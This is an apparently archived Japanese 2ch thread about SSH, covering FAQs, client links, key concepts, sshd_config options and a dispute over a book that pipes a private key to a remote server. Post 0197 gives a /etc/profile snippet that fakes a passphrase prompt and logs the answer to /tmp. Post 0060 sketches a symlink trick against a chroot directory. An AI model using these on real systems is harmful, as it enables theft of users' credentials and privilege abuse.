X



SSH その8
0001名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 18:50:57.67
SSHに関する情報交換のスレッドです。
FAQ、リンク集は >>2-5 あたり。

■前スレ
SSH その7
http://toro.2ch.net/test/read.cgi/unix/1266323017/

■過去スレ
その6 http://pc12.2ch.net/test/read.cgi/unix/1202782840/
その5 http://pc11.2ch.net/test/read.cgi/unix/1145484540/
その4 http://pc8.2ch.net/test/read.cgi/unix/1102242908/
その3 http://pc5.2ch.net/unix/kako/1058/10582/1058202104.html
その2 http://pc.2ch.net/unix/kako/1028/10281/1028157825.html
その1 http://pc.2ch.net/unix/kako/976/976497035.html
0002名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 18:51:52.35
よくある質問

Q.公開鍵認証などは使用せず、パスワードによる認証を行う場合でも
 そのパスワードは暗号化されているのですか?
A.はい、その通りです。
 SSHプロトコルでは、まず始めにサーバ<->クライアント間で
 暗号化された通信路を確立します。
 ユーザ認証はその暗号化通信路の上で行なわれるので、
 パスワードなどもちゃんと秘匿されています。

Q.最近、root,test,admin,guest,userなどのユーザ名で
 ログインを試みる輩がいるのですが?
A.sshdにアタックするツールが出回っているようです。
 各サイトのポリシーに従って、適切な制限をかけましょう。
 参考:http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/connect24h/2004.08/msg00030.html
0003名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 18:52:32.28
◇実装
本家ssh.com
 http://www.ssh.com/ / http://www.jp.ssh.com/ (日本語)
OpenSSH
 http://www.openssh.com/ / http://www.openssh.com/ja/ (日本語)
 OpenSSH情報:http://www.unixuser.org/~haruyama/security/openssh/
 日本語マニュアル:http://www.unixuser.org/~euske/doc/openssh/jman/
 OpenSSH-HOWTO:http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
TeraTerm/TTSSH
 http://hp.vector.co.jp/authors/VA002416/
 http://www.sakurachan.org/soft/teraterm-j/ttssh/ (日本語版)
 http://sleep.mat-yan.jp/~yutaka/windows/ / http://ttssh2.sourceforge.jp/ (Yutaka氏によるUTF-8対応版,SSH2対応版)
PuTTY
 http://www.chiark.greenend.org.uk/~sgtatham/putty/
http://pc8.2ch.net/test/read.cgi/unix/1084686527/
 http://hp.vector.co.jp/authors/VA024651/ (hdk氏による日本語パッチ)
 http://yebisuya.dip.jp/Software/PuTTY/ (蛭子屋氏による各種パッチ)
VeraTerm
 http://www.routrek.co.jp/product/varaterm/
MacSSH/SFTP
 http://pro.wanadoo.fr/chombier/
PortForwarder
 http://www.fuji-climb.org/pf/JP/
TRAMP
 http://www.nongnu.org/tramp/tramp_ja.html
0004名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 18:53:55.41
◇規格等
 ・RFC4250: The Secure Shell (SSH) Protocol Assigned Numbers
 ・RFC4251: The Secure Shell (SSH) Protocol Architecture
 ・RFC4252: The Secure Shell (SSH) Authentication Protocol
 ・RFC4253: The Secure Shell (SSH) Transport Layer Protocol
 ・RFC4254: The Secure Shell (SSH) Connection Protocol
 ・RFC4255: Using DNS to Securely Publish Secure Shell (SSH)
  Key Fingerprints
 ・RFC4256: Generic Message Exchange Authentication for the Secure
  Shell Protocol (SSH)
WideのSSH解説
 http://www.soi.wide.ad.jp/class/20000009/slides/12/
0005名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 22:45:40.10
リンクは修正したほうがいいかもしれないね。

OpenSSH
http://www.openssh.com/ja/ (日本語) ← 無くなってる
 http://www.jp.openbsd.org/openssh/ が日本語ページらしいが、実際は英語。


TeraTerm/TTSSH
 http://sleep.mat-yan.jp/~yutaka/windows/ ← 無くなってる
/ http://ttssh2.sourceforge.jp/ (Yutaka氏によるUTF-8対応版,SSH2対応版)

PuTTY
http://pc8.2ch.net/test/read.cgi/unix/1084686527/
 → 現行スレ Putty その3 【パティ】http://toro.2ch.net/test/read.cgi/unix/1302006799/


VeraTerm
 → Poderosaに名称変更 http://sourceforge.jp/projects/sfnet_poderosa/


MacSSH/SFTP
 http://pro.wanadoo.fr/chombier/ ← 無くなってる?

PortForwarder
 http://www.fuji-climb.org/pf/JP/
  → http://toh.fuji-climb.org/pf/JP/

TRAMP
 http://www.nongnu.org/tramp/tramp_ja.html ← ページがない。
  → http://www.nongnu.org/tramp/
0007名無しさん@お腹いっぱい。
垢版 |
2014/04/25(金) 23:12:13.51
SFTPクライアントやAndroid、iPad用のクライアントも入れたらどうだろう。

SFTPクライアント
WinSCP http://winscp.net/
WinSCP 日本語情報 http://sourceforge.jp/projects/winscp/

FileZilla https://filezilla-project.org/
FileZilla 日本語情報 http://sourceforge.jp/projects/filezilla/

Android
connectbot https://code.google.com/p/connectbot/
他にもいいのがある?

iPadについてはお手上げ。
0011名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 07:33:37.48
>>10
10ページにウソが書いてある。しれっとウソが書いてあると
その先読む気にならないよね。でも頑張って次ページに進む
と「公開鍵で制限出来る事」… ダメだこりゃ
0013名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 10:52:09.04
文脈からして
秘密鍵(を格納したファイルid_rsa)
公開鍵(を格納したファイルauthorized_keys)
だろ。
スライドなんだから文脈からわかることは聴衆が補完くらいしろや。
0017名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 12:26:46.52
文脈からいってssh2の公開鍵認証について説明している。
ssh2の公開鍵認証は暗号化→復号ではなくデジタル署名→検証
RSAは署名/検証, 暗号化/復号のどちらにも利用できるが、
DSAは署名/検証は出来るが、暗号化/復号は出来ない
筆者はssh2の認証方式を理解していないと判断せざるを得ない

11ページ
誤 公開鍵で出来る事
正 公開鍵認証で出来る事

その先は読む気にならない
0020名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 13:38:52.41
SSH-KEYGEN(1) BSD General Commands Manual SSH-KEYGEN(1)

ssh-keygen -y [-f input_keyfile]

-y This option will read a private OpenSSH format file and print an
OpenSSH public key to stdout.
0021名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 13:54:34.66
「秘密鍵ファイル」には「秘密鍵」と「公開鍵」が格納されているので「秘密鍵ファイル」から公開鍵は得ることが出来るが
秘密鍵から公開鍵を得る事は出来ない
0023名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 14:24:19.40
さあ? 公開鍵暗号を暗号化/復号に使うと思い込んでたのはスライド書いた奴だからな
書いた奴に聞けよ
0024名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 14:54:01.14
> 文脈からいってssh2の公開鍵認証について説明している。

そういう文脈だとわかってるやつが

> ssh2の公開鍵認証は暗号化→復号ではなくデジタル署名→検証
> RSAは署名/検証, 暗号化/復号のどちらにも利用できるが、
> DSAは署名/検証は出来るが、暗号化/復号は出来ない

みたいなずれた話を持ち出してくる意図の方がわからん。
0031名無しさん@お腹いっぱい。
垢版 |
2014/04/29(火) 22:42:46.64
秘密鍵と公開鍵ってのは鍵の使い方の話で、鍵の能力の話じゃないからねぇ…

>>14
暗号化に使った鍵で平文化は出来ないよ。そうでないと公開鍵暗号が成立しない。
公開鍵暗号は暗号化鍵を公開鍵として、平文化鍵を秘密鍵とする。
電子署名では暗号化鍵を秘密鍵として、平文化鍵を公開鍵とする。
暗号化鍵から平文化鍵が計算できるアルゴリズムは電子署名にしか使えず、
平文化鍵から暗号化鍵が計算できるアルゴリズムは公開鍵暗号にしか使えず、
どちらの鍵からももう一方の鍵を計算出来ないアルゴリズムはどちらにも使える。
さらに暗号化鍵と平文化鍵を入れ替える事ができる場合は単一の鍵ペアで両方できる。

秘密鍵ファイルの中に公開鍵も一緒に保存してあるか、秘密鍵から公開鍵が算出できるなら平文化できるけど、
電子署名でどちらも満たさない場合は復元できないよ。(普通は署名書として公開鍵添付するからンな事ないが)
0034名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 12:08:31.64
>>33
「公開鍵暗号を暗号化/復号に使うと思い込んでたのはスライド書いた奴だから」
スライドのどこで、それが分かる?

p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
それをファイル(文字列)化したものという意味の二つの使い方を同じページで
使ってるのがまずいと思う。
2行目の「秘密鍵からは公開鍵が生成できる」は「いわゆる秘密鍵ファイルには
公開鍵情報も含まれているので、公開鍵情報を取り出せる」という意味だろう。
好意的に解釈すれば。

このスライドを書いた奴は分かってないはず、という見地に立てば、秘密鍵ファイルから
公開鍵を取り出せることを、秘密鍵から公開鍵が生成できると勘違いしているともとれるが。

p11の「公開鍵で制限出来ること」というタイトルに対して「公開鍵認証で出来る事」という案を出しているけど
このページの話題は openssh の sshd の実装の話(他のsshサーバーでもこうなのかどうかは知らないので
間違ってたらごめんだけど)だから、誤りというほどではないと思う。
0035名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 14:29:27.08
用語の使い方に「怪しい」ところがある、ということなら
初心者には勧められない、ということになると思う

ちゃんと自分で解釈を脳内補完できる人には
多少の「誤解を招きかねない」表現も問題ないだろうが
件のドキュメントはそれができない人向けなんじゃ?
0037名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 15:09:13.09
>>34
> p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
> それをファイル(文字列)化したものという意味の二つの使い方を同じページで
> 使ってるのがまずいと思う。
秘密鍵を格納したファイルから公開鍵を取り出す事を「秘密鍵からは公開鍵が
生成できる」と表現したのなら、公開の場で発表する能力が無いって事だ。
0039名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 15:27:24.30
>>35
もくじを見ると件のページは、おさらいの一部になっている。
ということは自分で脳内補完できる人向けじゃないだろうか。
0045名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 19:43:47.34
コメントなりtwitterなりで指摘しないと
ここで叩いても気づかないんじゃないかな?
個人的には叩くほどのことじゃない気はする
0049名無しさん@お腹いっぱい。
垢版 |
2014/04/30(水) 23:25:32.54
RSAの場合、2つの素数p, q(p≠q)に対し(p,q)を秘密鍵, pqを公開鍵にするのだから秘密鍵から公開鍵を生成するのは簡単だよね?
0050名無しさん@お腹いっぱい。
垢版 |
2014/05/01(木) 00:08:19.46
>>49
id_rsaにmodules nとpublicExponent eが含まれてるから。


RFC 3447 PKCS #1: RSA Cryptography Specifications February 2003


A.1.2 RSA private key syntax

An RSA private key should be represented with the ASN.1 type
RSAPrivateKey:

RSAPrivateKey ::= SEQUENCE {
version Version,
modulus INTEGER, -- n
publicExponent INTEGER, -- e
privateExponent INTEGER, -- d
prime1 INTEGER, -- p
prime2 INTEGER, -- q
exponent1 INTEGER, -- d mod (p-1)
exponent2 INTEGER, -- d mod (q-1)
coefficient INTEGER, -- (inverse of q) mod p
otherPrimeInfos OtherPrimeInfos OPTIONAL
}
0056名無しさん@お腹いっぱい。
垢版 |
2014/05/01(木) 23:47:20.91
OpenSSHのsshd_configでChrootDirectoryを指定することってあるよね。
そのディレクトリに、
All components of the pathname must be root-owned directories that are not writable by any other user or group.
こういう制限があるけど、ナンデ?
005755
垢版 |
2014/05/01(木) 23:54:48.41
特権分離では?
0059名無しさん@お腹いっぱい。
垢版 |
2014/05/02(金) 01:28:27.26
ChrootDirectoryの親まではroot-ownedでroot以外not writableという制限は分かるような気がするんだけど、
例えば、chroot先を/home/oresama/ に指定するとき oresama がroot以外not writableになってると
oresamaは自分のホームディレクトリのはずなのにディレクトリもファイルも作れない。
ちょっと厳しくないかと思う。
0060名無しさん@お腹いっぱい。
垢版 |
2014/05/02(金) 01:37:37.96
>>58
「あのぉ、root先輩、ChrootDirectoryを /home/watashi/dakeno/himitsu/ にしてもらえませんかぁ。」って頼んで
「おっふ、やっといた」となったら
rmdir /home/watashi/dakeno/himitsu
ln -s /root /home/watashi/dakeno/himitsu
「計画通〜り」ってことだよね。
このためには/home/watashi/dakeno がwritableでなければ出来ないでしょ。
himitsu は writableでもかまわないんじゃないだろうか。
0069名無しさん@お腹いっぱい。
垢版 |
2014/06/02(月) 08:26:24.30
中国とかは法律的な理由もあるかも
暗号化通信は当局が解読可能な状態にしないと駄目なんだっけ?
VPN張る事自体問題視されるとか聞いたことあるけど
0071名無しさん@お腹いっぱい。
垢版 |
2014/09/14(日) 17:08:34.71
今SSHについて勉強してます。
どなたかRSA1、RSA、DSAの違いにつ
いて教えて頂けませんか?

メリット、デメリットがわからず、どれを使って良いのかわかりません。

自分で調べろやは無しでお願いします。
0074名無しさん@お腹いっぱい。
垢版 |
2014/09/14(日) 19:08:03.88
>>71
shでも学んでろ。

532 名無しさん@お腹いっぱい。 sage 2014/09/14(日) 17:11:01.54
今シェルについて勉強してます。
どなたかash、bsh、cshの違いにつ
いて教えて頂けませんか?

メリット、デメリットがわからず、どれを使って良いのかわかりません。

自分で調べろやは無しでお願いします。
0076名無しさん@お腹いっぱい。
垢版 |
2014/09/17(水) 05:52:02.33
みたいなじゃなくて改変コピペそのもの
こんなつまらんことを時々思い出したかのように繰り返してる狂人だからスルー推奨
0079名無しさん@お腹いっぱい。
垢版 |
2014/10/10(金) 08:24:44.85
# netstat -n | grep 22
したら、知らないホストでESTABLISHED接続になってて
# cat /var/log/secure| grep 知らないホスト(ロボット?)
から複数のアタックがあったのだけど、session openってログ無かったんですが、
ssh のセッションがESTABLISHEDになることってあるのでしょうか?
0083名無しさん@お腹いっぱい。
垢版 |
2014/10/10(金) 13:28:43.78
>>81, >>82
ありがとうございます。

/var/log/secureでsession openになってないので気にしなくていいのですね。
ポートNo変えようかなーと思ってます。
0088名無しさん@お腹いっぱい。
垢版 |
2014/10/11(土) 19:05:26.71
>>85 とある共用鯖で、アホな鯖管がルート奪取脆弱性ありのカーネル放置していて、これまたよく分かってないユーザが、何人も公開鍵、秘密鍵を一遍に取られてえらいことになった、つう事案があったよ。
0091名無しさん@お腹いっぱい。
垢版 |
2014/10/13(月) 16:13:39.16
>>90
coolですな。
0093名無しさん@お腹いっぱい。
垢版 |
2014/10/14(火) 17:23:56.12
もしかしたら ifconfig みたいにメンテナがいないからじゃない?
ftp 覗いてみたら tcp_wrappers_7.6.tar.gz のタイムスタンプは Apr 8 1997 だった
0096名無しさん@お腹いっぱい。
垢版 |
2014/10/14(火) 19:42:41.99
sshd_configのMatch AddressとDenyUsers, AllowUsersあたりでかわりにがんばれってことかなぁ
とりあえずはpf.confでやるけど
0100名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 10:07:44.17
誰か知ってたら教えて欲しいんだけど、UseDNSって何のために存在しているの?

manとか見るとクライアントのIPから逆引きでホスト名を確認して
IPアドレスとホスト名のマッピングが出来なかったら接続を許可しないって動きの
ようにみえるんだけど…

この辺の詳しい動きがよくわからん
0102名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 11:03:43.55
クライアントの IP アドレスを逆引きしてホスト名を得る
→そのホスト名を正引きして IP アドレスを得る
→その IP アドレスが元のと一致してなかったら蹴る
0103名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 11:42:47.38
そんなごく当たり前のIP逆引きチェックそのものを質問してるわけない、
質問の意図は別のところにある、と見るべき引っかけ問題。
0105名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 12:52:20.85
UseDNSをnoにすることってないのになぜオプションがあるのか、という質問?
IP解決はDNSとは限らない(NISとかhostsとか)のになぜDNSという設定名?
0106名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 12:55:17.30
逆引き出来ないクライアントから接続しているユーザーからの
「なんかログインに時間かかるんだけど」というクレームに
対応するため、逆引きをしないようにする機能だろ。
0112名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 13:47:55.43
ごめん、言葉が足らなかった。

このUseDNS、デフォルトだとYesになっていると思うんだけど、クライアントが逆引き出来ない状態
(DNSサーバへの接続が出来ない状態やそもそもレコードにIPが登録されていない状態)でもSSHって接続出来るじゃない?

だとしたら、どういう時に使えるの?と思って。

 1.IPアドレスがDNSに登録されている状態
  かつ
 2.そのホスト名を再度正引きしたら違うIPアドレスになっている

上みたいな状態の時だけは接続させないって認識であってるのかな?
レコードにいなかったり、DNSに接続出来ない時はそのままSSH接続出来るって事はわかるんだけど…
0114名無しさん@お腹いっぱい。
垢版 |
2014/10/18(土) 20:43:50.93
>>113
rhosts認証って、sshd_configのデフォルト設定だと有効になっていないよね?
てことは、sshd_configがデフォルトの状態のまま利用されていたら、このオプションでやってくれることってログの記録時にホスト名でロギングしてくれるくらいって
認識であっているかな?

他の何か利用用途ってあります?
0117名無しさん@お腹いっぱい。
垢版 |
2014/10/19(日) 15:35:56.74
>>116
> 考えてもしょうがないからさっさとnoにしちゃえよ
インシデントになったせいで、会議で説明しなきゃならないんだよ
0120名無しさん@お腹いっぱい。
垢版 |
2014/10/19(日) 20:27:25.16
>>118
>>119
とはいっても、サポートよりここの住人の方が詳しいし頼りになるし…
教えてもらった情報を元に海外のサイトとサポートで裏取しようと思ってたんだ

仕様の部分がもうよくわからなくて…
0123名無しさん@お腹いっぱい。
垢版 |
2014/10/20(月) 02:45:14.37
>>120
ホスト名で認証しない限りUseDNSはNoでいい。
今時IgnoreRhostsがnoになってることはないだろ。
デフォルトはrsh引きずってるだけ。
0127名無しさん@お腹いっぱい。
垢版 |
2014/10/21(火) 18:21:36.12
ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか?
0134名無しさん@お腹いっぱい。
垢版 |
2014/10/21(火) 19:33:29.40
>>126
× このスレでのSSHに関する情報交換は全面禁止となりました
○ このスレでのSSHに関するサポート乞食は全面禁止となりました
0136名無しさん@お腹いっぱい。
垢版 |
2014/10/26(日) 21:06:55.48
132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…

sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。
0139名無しさん@お腹いっぱい。
垢版 |
2014/11/23(日) 17:53:17.21
SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの?

Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)

ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。
0142名無しさん@お腹いっぱい。
垢版 |
2014/11/24(月) 05:16:14.38
>>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。
0143名無しさん@お腹いっぱい。
垢版 |
2014/11/29(土) 18:39:05.96
>139-142

失礼しやした。

結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。

で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。

これについては、
SSHのマニュアルか
http://www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
http://namazu.org/~tsuchiya/ssh/
http://uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。
0144143
垢版 |
2014/11/29(土) 21:40:37.22
自己レス

>>143

LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。

それから、
cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。

orz
0146名無しさん@お腹いっぱい。
垢版 |
2014/11/30(日) 09:01:56.33
cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'

これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。
0157名無しさん@お腹いっぱい。
垢版 |
2014/12/04(木) 01:37:00.88
うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか?
0158名無しさん@お腹いっぱい。
垢版 |
2014/12/04(木) 02:02:22.75
~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。
0159名無しさん@お腹いっぱい。
垢版 |
2014/12/04(木) 06:52:38.02
>>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。

お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?
0165名無しさん@お腹いっぱい。
垢版 |
2014/12/04(木) 09:54:07.71
とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった
0166名無しさん@お腹いっぱい。
垢版 |
2014/12/04(木) 09:56:28.68
新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
ttp://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない
0169名無しさん@お腹いっぱい。
垢版 |
2014/12/05(金) 00:16:32.57
>>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。
0172名無しさん@お腹いっぱい。
垢版 |
2014/12/05(金) 08:46:18.64
で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか?
0174名無しさん@お腹いっぱい。
垢版 |
2014/12/05(金) 15:58:44.63
読者を危険に晒した!というほどのおおげさなことなん?

chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。

scpしてchmodする直前のスキをつくというのはナシね。

物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。
0176名無しさん@お腹いっぱい。
垢版 |
2014/12/05(金) 18:54:33.93
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。
0179名無しさん@お腹いっぱい。
垢版 |
2014/12/05(金) 23:00:17.54
cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。

やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。
0184名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 02:42:15.93
>>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。


公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…
0185名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 03:02:41.76
>>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。

クライアント側で何か実行とかできるのかと思った。
0186名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 07:22:31.63
>>184
>>>180>>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。
0187名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 16:04:33.63
誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。

一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。
0188名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 18:12:25.55
>>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわw
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。
0192名無しさん@お腹いっぱい。
垢版 |
2014/12/06(土) 22:51:34.25
>>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。
0197名無しさん@お腹いっぱい。
垢版 |
2014/12/07(日) 23:50:08.35
悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね

# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi
0201名無しさん@お腹いっぱい。
垢版 |
2014/12/18(木) 11:35:04.54
川本が!川本が俺を殺しに来る!!
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11

これぐらいキレてもいいんだよきみ
0202名無しさん@お腹いっぱい。
垢版 |
2015/04/03(金) 16:29:47.36
あけましておめでとう。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。
0206名無しさん@お腹いっぱい。
垢版 |
2015/04/07(火) 11:27:12.23
話の流れを切って悪いが、アクセス制限について質問です。

自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、

<TCP Wrapperの場合>/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
<PAM認証の場合>/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」

どっちでも同じ効果が得られる気がするんだが、挙動に違いはある?
PAM認証を用いた方が細かく制御できるってだけ?
悪い接続元を弾くタイミングが違うとか?
0207名無しさん@お腹いっぱい。
垢版 |
2015/04/07(火) 16:29:56.81
>>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。

tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。

hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。

sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。

設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。
0208名無しさん@お腹いっぱい。
垢版 |
2015/04/07(火) 18:21:18.49
>>207
正に知りたい答えでした。
この前に入門書を買ったばかりでググってもイマイチ分からなかったので、素人でも分かる説明で助かります。

ありがとうございました!
0211名無しさん@お腹いっぱい。
垢版 |
2015/04/28(火) 11:48:29.85
本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様
0213名無しさん@お腹いっぱい。
垢版 |
2015/05/31(日) 16:59:57.64
Tera Term r2【テラターム】 - No.823
http://peace.2ch.net/test/read.cgi/unix/1225116847/823n
823 :823:2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age!
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。
0221名無しさん@お腹いっぱい。
垢版 |
2015/06/04(木) 20:38:59.15
質問失礼致します。

scpコマンドで
「リモートサーバー」と「そことローカル接続しているサーバー」で、
ファイルのやり取りは可能でしょうか?

具体的には、旧筐体から新筐体へデータ移行を行いたいのです
ただし旧筐体はネットワークから切り離されているという状況です
0222名無しさん@お腹いっぱい。
垢版 |
2015/06/04(木) 20:51:37.76
ローカル接続とは具体的にどのように接続しているのでしょうか?
新筐体がリモートサーバーで、旧筐体が、そこ(新筐体のことでしょうか?)とローカル接続しているサーバーですか?

新筐体と旧筐体がローカルなネットワークで接続されていて
今の場所から、旧筐体にはログインできないが、
新筐体にはログインできて、新筐体から旧筐体にはログインできるのなら
新筐体と旧筐体の間でscpなりrsyncなりなんなりと使えるでしょう。

FTPのサーバー間転送みたいなことはできませんけど。
0223名無しさん@お腹いっぱい。
垢版 |
2015/06/04(木) 21:03:36.40
>>222
